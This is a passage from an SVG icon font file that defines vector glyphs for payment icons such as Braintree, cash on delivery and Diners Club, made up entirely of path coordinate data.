0 18 5 18 13v1c-3 1-9 3-14 3-8 0-15-3-15-10z m385 32c-10 0-16-6-18-14h35c-2 9-9 14-17 14z m73 0c-9 0-16-6-18-14h35c-2 9-9 14-17 14z" />
<glyph glyph-name="braintree" horiz-adv-x="1000" unicode="&#xecc7;" d="M0 286v17h14v84h-14v18h55c25 0 41-12 41-32 0-13-8-22-18-26 14-4 24-14 24-27 0-22-17-34-44-34h-58z m33 101v-32h20c16 0 24 6 24 16 0 11-9 16-24 16h-20z m0-84h23c18 0 27 6 27 18 0 11-9 17-28 17h-22v-35z m169 45c-2 7-7 11-14 11-16 0-31-12-31-33v-23h31v-17h-68v17h19v53h-15v17h33v-15c6 11 17 18 32 18 17 0 27-10 30-23l-17-5z m93-11v4c0 13-10 18-21 18-10 0-19-4-26-11l-12 13c9 8 20 15 38 15 22 0 39-12 39-34v-39h13v-17h-31v9c-5-8-18-12-30-12-19 0-34 9-34 27 0 22 21 30 40 30 10 0 18-2 24-3z m0-16c-6 2-15 4-23 4-11 0-22-4-22-15 0-7 7-11 16-11 13 0 28 7 28 19v3z m140-18v-17h-88v17h37v53h-28v17h46v-70h33z m-33 88h-21v26h21v-26z m55-88h14v53h-13v17h30v-11c6 9 17 14 30 14 20 0 34-12 34-32v-41h13v-17h-45v17h14v36c0 15-9 19-18 19-14 0-27-10-27-26v-29h14v-17h-46v17z m133 53h-23v17h23v32h18v-32h43v-17h-43v-37c0-14 10-19 21-19 10 0 18 6 25 12l12-13c-8-8-20-16-37-16-22 0-39 12-39 35v38z m174-8c-2 7-7 11-14 11-15 0-30-12-30-33v-23h30v-17h-68v17h20v53h-16v17h33v-15c6 11 17 18 32 18 17 0 28-10 31-23l-18-5z m122-49c-9-9-25-16-43-16-29 0-50 20-50 46s20 47 48 47c27 0 47-21 47-50v-3h-76c3-15 15-23 31-23 13 0 25 5 31 12l12-13z m-73 39h54c-3 13-14 21-26 21-14 0-25-8-28-21z m185-39c-9-9-25-16-42-16-30 0-50 20-50 46s20 47 47 47c28 0 47-21 47-50v-3h-75c3-15 15-23 31-23 13 0 24 5 30 12l12-13z m-73 39h54c-2 13-14 21-26 21-14 0-24-8-28-21z" />
<glyph glyph-name="cash-on-delivery-alt" horiz-adv-x="1000" unicode="&#xecc8;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-585-207c2 3 3 3 6 1 19-17 38-33 57-49 4-3 3-4 0-7-32-39-65-78-97-117-2-2-3-3-6-1-16 14-32 28-49 42l1 1c8-3 16-5 24-8 10-2 20 2 23 11 4 9 0 18-8 24-7 3-13 7-20 11-5 2-5 4-2 8 15 17 30 35 45 53l26 31z m-153-114c0-3-1-5-5-5-3 0-5 0-5 5-2 20-4 41-6 62 0 4 1 5 4 5 2 0 4 0 6 0 5 1 6-1 6-6 0-10 0-20 0-31 0-10 0-20 0-30z m39 6c-5 6-10 7-16 5-4-2-9-3-14-4v49c0 2-1 4 3 4 13 2 25 7 38 11 14 4 27 0 41-2 3-1 7-2 11-2-8-11-16-20-24-30-2-2-5-1-8-1-4 0-7-1-8-5-2-4 1-7 4-9l32-18c6-3 9-7 7-13-2-6-7-9-14-7-14 4-27 9-41 14-5 1-8 4-11 8z m131-129c-14 0-28 1-41 0-14 0-25 5-35 13-10 9-20 18-30 27-6 5-7 12-3 17 4 5 10 5 16 1 10-6 20-13 30-20 6-4 13-7 21-7 13 0 27 0 40 0 3 0 6 0 6 3 0 4-3 4-6 4-8 0-16 0-25 0-6 1-10 5-10 10 0 6 4 11 10 11 21 0 42 1 62-1 14-1 22-9 28-19 8-14 13-29 19-44-20-2-38-3-57-5-2 0-4-1-5 2-5 7-12 8-20 8z m78-29h-25c-10 0-21 0-31 0-3 0-4 1-4 4 0 3-1 6 4 6 21 2 43 4 64 6 3 0 3-1 3-3 2-12 1-13-11-13z m39 184c0 3 1 6 2 9s2 6 5 8c2 3 4 5 7 6s7 3 11 3c4 0 8-1 12-3 3-3 6-5 7-9l-6-4c-1 2-2 3-3 4-1 1-2 2-3 3-1 0-2 1-4 1-1 0-2 0-3 0-3 0-5 0-7-1s-4-3-5-5c-2-2-3-4-4-6 0-2-1-4-1-7 0-2 1-4 2-7s2-4 3-6c2-2 3-3 5-4 2-1 4-2 7-2 1 0 2 1 4 1s2 1 3 1c2 1 3 2 4 3s2 2 2 4l7-4c-1-2-2-4-3-5s-4-3-5-4c-2-1-4-2-6-2s-4-1-6-1c-4 0-7 1-10 2-3 2-6 4-8 6s-4 6-5 9c-1 3-2 6-2 10z m81-122c-2-5-5-10-9-14-3-4-8-7-14-9s-11-3-18-3h-33v90h33c7 0 14-1 19-3s11-6 14-10c4-4 7-9 9-14 2-6 3-12 3-18 0-7-1-13-4-19z m4 95c0 0-1 0-2 0 0 0-1 0-2 0-1 0-2 1-3 1s-1 2-2 3l0 3c-1-3-4-4-6-6s-5-1-8-1c-2 0-4 0-5 0s-3 2-4 3c-2 1-2 2-3 4s-1 3-1 4c0 2 0 4 1 5s2 3 3 4c2 1 3 2 5 3s5 1 7 1c2 0 4-1 5-1 2 0 4-1 5-1v2c0 3-1 5-2 7s-4 2-7 2c-2 0-4 0-6-1-2-1-4-2-6-3l-3 5c5 3 10 5 16 5 5 0 9-1 12-4s4-6 4-12v-13c0-1 0-2 1-2s1-1 2-1v-7z m28 14c-2 1-4 2-8 3-2 0-4 1-6 2s-3 1-4 2c-1 0-2 1-3 2 0 1 0 3 0 4 0 2 0 4 1 5s2 3 3 4c1 1 3 2 5 3 2 0 4 0 6 0 3 0 5 0 8-1 2-1 5-2 7-4l-4-4c-3 2-7 4-11 4-2 0-4-1-6-2-1 0-2-2-2-4 0-1 0-1 1-2 0 0 1-1 1-1 1-1 2-1 3-1 1-1 2-1 4-1 2-1 5-2 6-2s4-2 5-2c1-1 2-2 3-3 0-2 1-3 1-5 0-1-1-3-1-4s-2-3-3-4-3-2-5-3c-2 0-4 0-7 0-1 0-3 0-4 0-2 0-4 1-5 1s-3 1-5 2c-1 1-2 1-3 2l3 5c5-3 9-4 14-4 3 0 5 0 6 1s2 2 2 4c0 2-1 3-2 3z m50-105c0-1 0-2 0-2h-52c0-3 1-5 2-7s2-4 4-6c1-1 3-2 5-3 2-1 5-1 7-1 3 0 6 1 9 2 3 2 6 4 7 7l14-4c-2-5-6-9-11-13s-12-5-20-5c-5 0-10 1-14 3-5 2-9 4-12 8-3 3-5 6-7 11s-2 8-2 13c0 5 1 9 2 13s4 8 7 11c3 4 7 6 11 8s10 3 15 3 11-1 15-3 8-4 11-7c3-4 5-7 7-11s2-9 2-13c0-2 0-3 0-4z m1 91h-8v22c0 3-1 6-2 8s-3 2-5 2c-2 0-3 0-4-1-1 0-2-1-3-1s-2-2-3-3c0-1-1-3-1-4v-23h-8v54h8v-23c1 3 3 5 6 6s5 2 8 2c2 0 4 0 6-1 1-1 2-2 3-3s2-3 2-5c1-2 1-4 1-6v-24z m35-122c-3 0-6 0-9 0-5 0-9 1-12 4-3 3-4 7-4 12v78h17v-71c0-5 2-8 7-8 1 0 2 0 3 1 1 0 2 0 3 1l3-14c-3-1-5-2-8-3z m1 123c-2 1-4 3-6 5s-3 4-4 6c-1 2-1 5-1 8 0 2 0 5 1 7s2 5 4 6c2 2 4 4 6 5s5 1 8 1 6 0 8-1 5-3 7-5c1-1 3-3 4-6s1-5 1-7c0-3-1-6-1-8s-3-5-4-6c-2-2-4-4-7-5s-5-1-8-1c-3 0-6 0-8 1z m31-122h-17v67h17v-67z m0 76h-17v17h17v-17z m4 84h7v-8c2 3 4 5 7 6s5 2 9 2c2 0 4 0 5-1s3-2 4-3c1-2 1-3 2-5s0-4 0-6v-24h-8v22c0 3 0 6-2 8-1 1-2 2-5 2-1 0-2 0-3-1-1 0-2-1-3-2s-2-1-3-2c-1-2-1-3-2-4v-23h-8v39z m48-160h-19l-24 67h17l17-53 17 53h17l-25-67z m99 30c0-1 0-2 0-2h-52c0-3 1-5 2-7s2-4 4-6c2-1 4-2 6-3 2-1 4-1 6-1 3 0 7 1 10 2 3 2 5 4 6 7l15-4c-3-5-7-9-12-13s-12-5-20-5c-5 0-10 1-14 3-5 2-8 4-11 8-3 3-6 6-7 11s-3 8-3 13c0 5 1 9 2 13s4 8 7 11c4 4 7 6 12 8s9 3 14 3 11-1 15-3 8-4 11-7c3-4 5-7 7-11s2-9 2-13c0-2 0-3 0-4z m51 22c-5 0-10-1-14-3-4-2-7-5-9-9v-40h-17v67h16v-15c2 5 5 9 9 11s7 5 11 5c1 0 2 0 2 0 1 0 1-1 2-1v-15z m42-66c-2-5-5-9-9-12-4-2-9-4-14-4-3 0-6 1-9 2v14c2 0 3 0 4 0s3-1 4-1c1 0 2 0 3 1 0 0 1 1 2 2s2 2 2 4c1 2 2 4 3 7l-27 67h18l18-52 17 52h16l-28-80z m-409 154c-3 0-5 0-7-2-2-1-3-3-3-5 0-2 1-3 3-4s3-2 5-2c2 0 4 0 5 1s4 1 5 3c1 1 1 2 1 3v5c-1 0-3 0-4 1-2 0-3 0-5 0z m153-5c0 2 1 4 1 6s-1 3-1 5c-1 1-2 3-3 4-1 1-2 2-3 2-2 1-3 1-5 1s-3 0-4-1c-2 0-3-1-4-2s-2-3-2-4c-1-2-1-4-1-6 0-1 0-3 1-5 0-1 1-3 2-4 1-1 2-2 4-2s3-1 4-1 3 0 5 1 2 1 3 2c1 1 2 3 3 4z m-159-68c-3 2-5 4-9 6-3 1-7 2-11 2h-16v-60h16c4 0 8 1 11 2s7 4 9 7c2 2 4 6 5 9 1 4 2 8 2 12s-1 8-2 12c-1 4-3 7-5 10z m68-12c-2 0-5 0-7-1s-3-2-5-3-3-3-4-5-1-5-1-7h34c0 5-2 9-5 12-3 3-7 4-12 4z m219 0c-2 0-4 0-6-1s-4-2-6-3-2-3-3-5-2-5-2-7h35c-1 5-3 9-6 12-3 3-7 4-12 4z m-497 62c15 0 26 11 26 25 0 16-13 30-29 30-14 0-26-11-26-26 0-16 13-29 29-29z m-15 42c4-4 9 6 12-2 1-2-1-2-2-3-2-2-5-4-4-6 2-3 5 0 7 1 9 5 16 1 15-9 0-2-1-3 1-5 2-1 2-3 0-5-1-2-3-2-4 0-3 1-4-1-5-2-3-2-4-1-6 1-3 3 0 4 2 5 1 1 2 2 3 3 1 1 3 2 1 4-2 2-3 1-4 0-4-2-6-3-10-3-4 0-7 2-8 6-1 4 2 8-2 12 0 0 3 4 4 3z" />
<glyph glyph-name="cash-on-delivery" horiz-adv-x="1000" unicode="&#xecc9;" d="M124 400c9-4 17-9 26-14 11-6 15-18 10-29-4-12-16-17-28-14-11 3-21 6-31 10l-1-2c21-17 41-34 62-52 3-2 4-2 6 1 41 49 82 97 123 146 3 4 4 6 0 10-25 20-49 40-73 60-3 3-4 3-7 0-10-13-21-26-32-39-19-22-38-45-57-67-4-5-4-7 2-10z m64 43c20-1 37-18 37-37 0-19-14-33-33-32-20 0-37 17-37 36 0 19 15 33 33 33z m60-235c2-3 4-3 7-2 23 2 46 4 71 6-8 19-14 38-24 55-7 13-18 23-35 24-26 3-52 1-78 1-8 0-13-6-12-13 0-7 5-12 13-13 10 0 20 0 30 0 4 0 7 0 7-5 1-4-3-4-7-4-16 0-33 0-50 0-10 0-19 3-27 9-12 9-24 17-37 25-7 5-15 4-19-2-6-6-5-14 2-21 13-11 26-22 39-33 12-11 26-17 43-17 17 1 35 0 52 0 10 0 19-2 25-10z m-97 153c2 8-1 13-8 17-14 7-27 15-40 23-5 2-8 5-6 11 1 5 5 6 10 6 4 0 8-2 10 2 10 11 20 23 31 36-6 1-10 2-15 3-17 3-33 7-51 2-16-5-31-10-48-13-4 0-4-3-4-5v-62c7 2 13 3 18 5 8 3 15 1 20-6 4-4 8-8 14-10 17-6 34-12 51-17 9-3 16 1 18 8z m180-159c-27-3-54-6-81-8-6 0-5-4-5-7 0-4 2-5 5-5 14 0 27 0 40 0v0h31c15 0 16 0 14 16 0 2 0 4-4 4z m-319 254c-2 0-4 0-7 0-4 1-5-1-5-6 3-26 5-52 7-78 1-5 3-5 7-5 5-1 6 2 6 6-1 13 0 25 0 38 0 13-1 25 0 38 0 6-2 8-8 7z m158-49c2-4 5-7 10-7 5 0 8 2 12 4 2 1 4 2 6 0 2-2 0-4-2-6-1-1-2-2-4-3-2-1-5-2-2-6 2-3 4-4 8-2 1 2 3 5 6 3 2-2 3-2 5 0 2 3 2 4 0 7-2 1-1 4 0 5 0 13-8 18-20 12-3-1-6-5-8-2-2 4 2 6 4 8 2 1 4 1 3 4-4 10-11-3-15 2-2 1-5-4-5-4 5-4 0-10 2-15z m218-25c4-2 8-3 12-3 3 0 5 0 8 1s5 1 7 3c3 1 5 2 7 4s3 4 4 7l-8 5c-1-2-2-4-4-5-1-2-2-3-4-4-1 0-3-1-5-1s-3-1-4-1c-3 0-6 1-9 2-2 1-4 3-6 5s-3 5-4 8c-1 3-2 6-2 9 0 3 0 6 1 8s2 6 4 8c2 2 4 4 7 5 2 2 5 3 8 3 2 0 3-1 5-1s3-1 5-2c1 0 3-2 4-3s2-3 3-5l8 6c-2 4-5 7-9 10-4 3-9 4-15 4-5 0-10-1-13-3s-7-4-10-7c-3-4-5-7-6-11-2-4-2-8-2-12 0-4 0-8 2-12 1-4 3-7 6-10 3-4 6-7 10-8z m86 9v17c0 7-2 11-6 15s-8 5-15 5c-7 0-13-2-19-6l3-7c2 2 5 3 8 4 2 1 5 2 7 2 4 0 7-1 9-3s3-5 3-9v-3c-2 1-4 1-6 2s-5 0-7 0c-3 0-6 0-8-1s-5-2-6-3c-2-1-4-3-5-5-1-1-1-4-1-6 0-2 0-4 1-6 1-2 2-3 3-5 2-1 4-2 6-3s4-1 6-1c4 0 7 1 10 2 3 2 6 4 8 7l0-3c1-2 1-3 2-4s3-1 5-1c0 0 1 0 2 0s2 0 3 0v9c-1 0-2 0-3 0 0 1 0 2 0 3z m-10 3c0-1-1-2-2-3-1-2-3-3-5-4s-5-1-7-1c-3 0-5 0-7 2s-3 4-3 6c0 3 2 5 4 6s5 3 9 3c1 0 3-1 5-1s4-1 6-2v-6z m40-8c-6 0-12 2-18 6l-4-7c2-1 3-2 5-3s3-1 5-2c2-1 4-1 6-1s4-1 6-1c3 0 6 1 8 1s5 2 6 3 3 3 4 5c1 2 2 4 2 6 0 2-1 4-2 5 0 2-1 3-3 4-2 1-3 2-6 3s-5 1-8 2c-2 1-4 1-5 2s-3 0-4 1c0 0-1 1-1 2-1 0-1 1-1 2 0 2 1 4 3 5s4 2 6 2c5 0 10-2 15-5l4 6c-2 2-5 3-8 4s-7 2-11 2c-2 0-5 0-7-1s-4-2-6-3c-2-1-3-3-4-5s-1-4-1-6c0-2 0-4 0-5s2-2 3-3c2-1 3-2 6-3s4-2 7-2c5-1 8-2 10-3 2-1 3-3 3-5 0-2-1-3-3-5-2-1-4-1-7-1z m68 36c-1 2-3 3-5 4s-4 2-7 2c-4 0-7-1-10-3-3-2-6-4-8-8v29h-10v-67h10v29c1 1 1 3 2 4 1 2 2 3 4 4s2 2 4 2c1 1 2 1 4 1 3 0 5-1 7-3s2-6 2-10v-27h10v29c0 3 0 5-1 8s-1 4-2 6z m77-36c2 2 3 5 5 8s1 6 1 9 0 7-1 10c-2 3-3 5-5 7-3 3-5 5-8 6s-7 2-10 2c-4 0-7-1-10-2s-6-3-8-6c-2-2-4-4-5-7s-2-7-2-10 1-6 2-9c1-3 3-6 5-8 2-3 4-4 7-6s7-2 11-2c3 0 7 1 10 2s5 3 8 6z m-18 1c-2 0-4 0-6 1s-3 2-4 3c-2 2-3 4-3 6s-2 4-2 6c0 2 1 4 2 6 0 2 1 4 3 6s2 2 4 3c2 1 4 1 6 1 2 0 4 0 5-1s4-2 5-3c1-2 2-3 3-5s1-5 1-7c0-2-1-4-1-6-1-2-2-4-3-5-2-2-3-3-5-4-1-1-3-1-5-1z m43 21c1 1 1 3 2 4 1 2 3 3 4 4 1 1 2 2 4 2 1 1 3 1 4 1 3 0 5-1 7-3 1-2 2-6 2-10v-27h10v29c0 3 0 5-1 8s-1 4-2 6c-1 2-2 3-4 4-2 1-4 2-7 2-4 0-8-1-12-3-3-2-6-4-8-8v10h-9v-48h10v29z m-212-84c-5 5-11 9-18 12s-15 4-25 4h-41v-114h41c9 0 17 2 24 4s12 7 17 12c5 5 9 11 12 18s4 15 4 23c0 8-2 16-4 23s-6 12-10 18z m-11-55c-1-5-4-9-6-12-3-4-7-6-11-8s-9-3-14-3h-20v75h20c5 0 10-1 14-3 4-2 8-4 11-7s5-8 6-12c2-5 2-10 2-15 0-6 0-11-2-15z m112 30c-4 4-9 7-14 9s-12 4-19 4c-6 0-13-1-18-4-6-2-10-5-14-9s-7-9-9-14c-2-5-3-11-3-17 0-6 1-11 3-17s5-9 9-13c4-4 8-7 14-10s11-3 18-3c10 0 18 2 25 6s11 9 14 16l-18 5c-1-3-4-6-8-8s-8-3-12-3c-3 0-5 0-8 1-3 1-5 2-7 4s-4 4-5 7c-1 2-2 5-2 9h65c0 0 0 1 0 3s0 2 0 4c0 5-1 11-3 16-2 5-5 10-8 14z m-55-24c1 4 1 6 3 9 1 3 2 5 4 7s4 3 7 4c2 1 5 1 8 1 6 0 11-2 15-5s6-9 7-16h-44z m114-30c-2 0-3 0-5 0-5 0-8 3-8 9v90h-22v-98c0-7 2-12 6-15s9-6 15-6c3 0 7 1 11 1 4 1 7 2 10 3l-3 18c-1-1-3-1-4-2z m16 65h22v-84h-22v84z m0 33h22v-21h-22v21z m76-99l-22 66h-22l31-84h23l31 84h-20z m123 55c-3 4-8 7-13 9s-12 4-19 4c-7 0-13-1-18-4-6-2-11-5-14-9s-7-9-9-14c-2-5-3-11-3-17 0-6 1-11 3-17s5-9 9-13c4-4 8-7 14-10s11-3 18-3c9 0 18 2 24 6s12 9 15 16l-18 5c-2-3-4-6-8-8s-8-3-12-3c-3 0-6 0-8 1-3 1-5 2-7 4s-4 4-5 7c-1 2-2 5-2 9h65c0 0 0 1 0 3s0 2 0 4c0 5-1 11-3 16-2 5-5 10-9 14z m-54-24c0 4 1 6 2 9 2 3 3 5 5 7s4 3 7 4c2 1 5 1 8 1 6 0 11-2 15-5s6-9 7-16h-44z m125 37c-5 0-10-2-15-6s-8-8-11-14v18h-20v-84h22v51c2 5 5 9 11 11 5 2 11 4 17 4v19c0 1-1 1-2 1s-1 0-2 0z m72-2l-20-65-23 65h-22l33-84c-1-3-2-6-3-9s-2-4-3-5c-1-1-2-2-3-3s-3 0-4 0c-1 0-3 0-4 0s-4 0-6 1v-19c4-1 8-1 12-1 6 0 12 1 17 5 5 3 9 8 11 15l35 100h-20z" />
<glyph glyph-name="diners-club-alt-1" horiz-adv-x="1000" unicode="&#xecca;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-184-487c-27-22-59-36-94-42-9-1-18-2-27-2-30 0-59 0-89 0-63 1-114 27-151 77-28 37-38 78-35 123 3 30 11 58 27 83 23 37 55 62 96 77 20 7 42 10 63 10 15 0 29 0 47 0 16 0 34 1 53 0 39-3 75-16 106-39 27-20 47-44 60-74 11-26 16-53 14-81-3-55-28-98-70-132z m-210 311c-94-1-169-77-169-169 0-94 76-169 169-170 94 0 170 76 170 170 0 93-76 169-170 169z m-38-170v-96c0-4 0-4-3-2-10 4-19 10-27 17-20 16-31 36-37 60-9 41 10 86 44 109 6 4 13 8 20 11 2 1 3 2 3-2 0-32 0-64 0-97z m133-51c-12-22-30-37-53-47-2-2-3-1-3 2 0 32 0 64 0 96v97c0 4 0 4 4 2 58-25 82-94 52-150z" />
<glyph glyph-name="diners-club-alt-2" horiz-adv-x="1000" unicode="&#xeccb;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-5-293c3 1 7 2 10 4 2 1 2 1 2-1v-37c3 2 5 4 8 5 8 4 17 2 23-5 5-8 6-17 2-26-4-9-10-14-20-16-5 0-10 1-15 3-1 1-3 1-4 0-1-1-1-2-3-1-1 1 0 2 0 3 1 5 1 9 1 14v49c0 3-1 4-4 6-1 0-1 0-1 1 0 1 0 1 1 1z m-51-29l10 1c3 0 3 0 3-3v-27c0-2 0-4 0-6 2-5 6-7 11-6 4 1 7 3 10 6 0 0 0 1 0 1v26c0 2 0 2-1 3-2 1-4 1-6 2-1 0-1 1-1 1 0 1 0 1 1 1 5 1 9 1 14 2 1 0 2-1 2-2v-38c0-2 0-2 3-3h3c1 1 1 0 1-1 0 0 0-1-1-1-5 0-9-1-13-3-2 0-2 0-2 1v8c-3-3-5-5-8-6-3-2-7-3-10-3-6 0-11 4-11 10-1 8 0 16 0 23v6c-1 4-2 5-5 6-1 0-2 0-2 1 0 1 1 1 2 1z m-22-43h0c4 0 5 1 5 5v55c0 1 0 3 0 4 0 3-2 5-4 5-1 0-2 0-2 1 0 1 1 1 1 2 4 1 8 2 11 5 2 0 2 0 2-1 0-1 0-2 0-3v-67c0-5 1-5 6-6 1 0 1 1 1-1 0-1 0-1-1-1-7 0-13 0-20 0 0 0-1-1-1 1 0 1 0 2 2 1z m-110 12c-1 2-3 3-5 4-3 1-6 2-8 4-6 3-8 8-7 14 1 6 6 10 12 11 5 1 10 0 14-2 1-1 2-1 2-2l0-8c0-1 0-2-1-2-1 0-1 0-2 1 0 1 0 2 0 2-2 7-9 9-14 7-5-2-6-7-3-10 1-2 3-4 5-5 3-1 6-2 9-4 7-3 9-8 8-14 0-5-5-9-11-11-6-2-12-1-18 2-1 0-1 1-1 2l-1 7c0 1 0 2 0 3 0 1 0 1 1 1 1 0 1 0 1-1 0-2 1-4 2-5 3-5 8-7 13-6 6 1 8 7 4 12z m-58-12c1 0 2 0 3 0 3 1 3 1 3 4v21c0 2 0 4 0 7 1 2-1 4-3 5 0 0-1 0-1 0-1 0-1 1-1 1 0 1 0 1 1 2l11 5c1 0 2 0 2-2v-9c2 3 3 6 5 8 3 2 6 4 10 3 3-1 5-4 4-8-2-3-5-4-7-2-3 2-5 2-8 1-3-2-4-4-4-8 0-8 0-16 0-24 0-2 0-3 3-3 2-1 4-1 6-1 1 0 2 0 2-1 0-1-1-1-2-1-8 0-16 0-24 0-1 0-1 0-1 1 0 1 0 1 1 1z m-36 38c7 9 21 9 28 2 3-3 4-8 4-12 0-2-1-2-2-2h-26c-2 0-2 0-2-1 0-5 0-9 2-13 5-10 14-13 23-6 1 1 3 2 4 3 0 0 0 0 1 0 0-1 1-1 0-2-4-5-8-9-14-11-10-2-18 2-22 11-4 11-3 22 4 31z m-56-38h1c3 1 4 1 4 5 0 8 0 17 0 25 0 4-1 6-5 8 0 0-1 0-1 0 0 1 0 2 1 3 4 1 8 2 12 4 1 0 1 0 1-1v-6c4 2 6 4 10 5 2 1 5 2 8 2 7 0 11-4 12-10 0-2 0-4 0-6v-25c0-3 1-3 4-4 1 0 1 0 2 0 1 0 1 0 2-1 0-1-1-1-2-1h-19c-1 0-2 0-2 1s1 1 2 1h1c3 1 4 1 4 4v26c0 7-5 11-12 9-3-1-6-2-9-4-1 0-1-1-1-2v-29c0-2 1-3 3-3 1-1 2-1 3-1 1 0 1 0 1-1 0-1 0-1-1-1h-19c-1 0-2-1-2 1s1 1 2 1z m-16 71c3 0 5-2 5-5 0-3-2-5-5-5s-5 3-5 5c0 3 3 5 5 5z m-10-71c5 0 6 1 6 6 0 8 0 17 0 25 0 4-1 6-4 7-1 1-2 1-2 2s1 1 2 1c3 1 7 2 10 4 2 1 2 0 2-2v-38c0-4 1-5 5-5 1 0 2 1 2 0 1-1 0-2-1-2-7 0-13 0-20 0-1 0-1 0-1 1 0 1 0 1 1 1z m-75 70c6 0 12 0 16 0 9 0 16 1 24-1 11-2 20-8 26-18 11-20 1-44-20-51-6-2-12-2-18-2-9 0-19 0-28 0-1 0-2-1-2 1 1 1 0 1 2 2 7 0 8 2 8 9v48c0 1 0 3 0 5-1 2-3 4-6 4 0 0-1 0-2 0-1 0-1 1-1 2-1 1 0 1 1 1z m-61-143c-15-12-32-19-50-22-5-1-10-1-15-1-16 0-31-1-47 0-34 0-61 14-81 41-15 19-20 41-18 65 1 16 5 31 14 45 12 19 29 33 51 40 11 4 22 6 34 6h25c8 0 18 0 28 0 21-2 40-8 57-21 14-10 25-24 32-40 6-13 8-28 7-43-2-29-15-52-37-70z m75 8c-5 1-10 1-14 0-1 0-2 0-2 1 0 2 1 2 2 2 2 0 3 0 3 3v28c0 3-1 4-4 4-1 0-1 0-1 1 0 1 1 1 1 1 5 0 11 0 16 0 0 0 1 0 1-1 0-1 0-1-1-1-3 0-4-1-4-4v-28c0-3 1-3 3-4 1 0 2 1 2-1 0-1-1-1-2-1z m48 38c-3 0-4-1-4-5 0-10 0-21 0-32 0 0 1-1 0-1-1-1-2-1-3 0-2 3-5 5-7 8-7 8-14 15-21 23v-13c0-4 0-7 0-11 0-3 1-4 4-4 1 0 2 0 2-2s-1-1-2-1c-4 1-8 1-12 0-1 0-1 0-1 2 0 1 0 1 1 1 2 0 4 1 4 3 0 1 1 3 1 4v23c0 3-2 5-5 5-1 0-1 1-1 1 0 1 0 1 1 1 3 0 6 0 10 0 1 1 1 0 2-1l22-25c0 0 1-1 2-1v19c0 5-2 6-6 6-1 0-1 1-1 1 0 1 1 2 1 2 5-1 9-1 14 0 0 0 1-1 1-1-1-1-1-2-2-2z m42-5c0-1-1-1-2-1-1-1-1 0-1 1 0 3-1 4-5 4-2 0-4 0-6 0-1 0-2 0-2-2 0-4 0-9 0-14 0-4 0-9 0-13 0-4 1-6 5-5 1 0 1-1 1-2s0-1-1-1c-2 0-5 1-7 1-3 0-7-1-10-1-1 0-1 0-1 1 0 1 0 2 1 2 4 0 5 0 5 4v28c0 2-1 2-2 2-3 0-5 0-8 0-3 0-3 0-4-4 0 0 0 0 0 0 0-1-1-1-2-1-1 0-1 1-1 1 1 3 1 5 1 8 0 0 0 1 1 1 0 0 1 0 1 0 1-2 2-2 3-2h30c1 0 2 0 2 2 1 0 1 0 2 0 0 0 0-1 0-1 0-3 0-5 0-8z m34-25l-1-6c-1-1-1-2-2-2-5 0-10 0-14 0h-14c-1 0-1 0-1 1 0 2 0 2 1 2 3 0 4 0 4 3v28c0 3-1 4-4 4-1 0-1 0-1 1s0 1 1 1c9 0 17 0 26 0 1 0 2 0 2-1-1-2 0-5 0-7 0-1-1-1-2-1-1-1 0 0-1 1 0 4-2 5-6 5-2 0-4 0-7 0 0 0-1 0-1-1 0-4 0-8 0-12 0-1 1-1 2-1 1 0 3 0 5 0 2 0 3 1 4 3 0 1 0 2 1 2 2 0 1-2 1-2 0-4 0-7 0-10 0-1 0-2-1-2-2 0-1 1-1 1-1 4-1 4-5 4h-5c-1 0-1 0-1-1v-11c0-2 1-3 3-4 3 0 6 0 10 1 3 0 4 2 5 5 0 1 0 1 1 1 2 0 1-1 1-2z m40-8c-3 1-6 1-9 0-1 0-1 1-2 2-3 5-7 10-10 15 0 1 0 2-2 2-2 0-2 0-2-2v-10s1-4 4-4c1 0 2 0 2-2 0-1-1-1-2-1h-6c-3 1-6 1-9 0-1 0-2 1-2 2 0 1 1 1 2 1 3 0 3 1 3 4v26c0 4 0 5-4 5-1 0-1 1-1 1 0 1 0 2 1 1 2 0 4 0 6 0l12 0c2 0 4 0 6 0 3-1 6-3 7-7 1-4 0-7-3-10-1-1-1-1-2-1-1-1-2-1-2-2 0-1 1-2 1-3l8-11c1-2 2-3 4-3 2 0 1-1 1-2 1-1 0-1-1-1z m43 33c0 0 0-1 0-2 0-10-1-20 0-30 0-1 0-1 0-2-1 0-2 0-3 1l-3 4-23 25c-1 1-1 1-2 2 0-8 0-16 0-24 0-3 1-4 5-4 1 0 1-1 1-2 0-1 0-1-1-1-4 1-9 1-13 0-1 0-2 0-2 1 0 1 0 1 1 2 4 0 5 1 5 4 0 3 0 5 0 8v17c0 4-1 6-5 6 0 0-1 0-1 1 0 1 1 1 1 1 4 0 7 0 11 0 1 0 1-1 2-1l22-25c0 0 0-1 1-1 0 0 0 1 0 1v18c0 5-1 6-5 6-1 0-1 1-1 1 0 1 0 1 1 1 5 0 9 0 14 0 0 0 1 0 1-1 0 0 0-1-1-1-3 0-5-2-5-5z m44-33l-6 1c-3 0-6 0-9-1 0 0-1 0-1 1 0 1 0 2 1 2 3 0 3 0 3 3-1 2-2 5-3 7 0 1-1 1-1 1-4 0-7 0-10 0-2 0-2 0-2-1-1-2-1-5-2-7-1-2 0-3 2-3 1 0 1-1 1 0 1 0 1-1 1-2 0-1 0-1-1-1-4 1-7 1-11 0-1 0-1 0-1 1 0 1 0 1 1 2 2 0 3 1 4 3 4 11 7 21 11 32 0 1 1 1 1 1 2 1 3 1 4 2 1 1 2 1 2-1l9-24 3-11c1-1 2-3 4-3 1 0 1 0 1-1 0 0 0-1-1-1z m35 33c0-1-1-1-2-1-1-1 0 0 0 1-1 3-2 4-5 4h-7c-1 0-1 0-1-2 0-4 0-9 0-14v-14c0-3 1-4 4-4 1 0 2-1 2-2 0-1-1-1-2-1-5 1-11 1-16 0-1 0-2 0-2 1 0 1 1 2 1 2 4 0 5 0 5 4 0 10 0 19 0 29 0 1 0 1-1 1-3 0-6 0-8 0-3 0-4-1-5-3 0-1 0-1 0-2 0-1-1 0-2 0 0 0 0 0 0 1 0 3 1 5 1 8 0 0 0 1 0 1 1 0 1 0 2 0 0-2 1-2 3-2h29c1 0 2 0 3 2 0 0 1 0 1 0 1 0 1-1 1-1-1-3-1-5-1-8z m-9 60c0 2-1 5-1 7 0 15 10 28 24 34 11 4 21 3 32 0l7-2c1-1 1-1 1-2l1-12c0-1 0-2-1-2 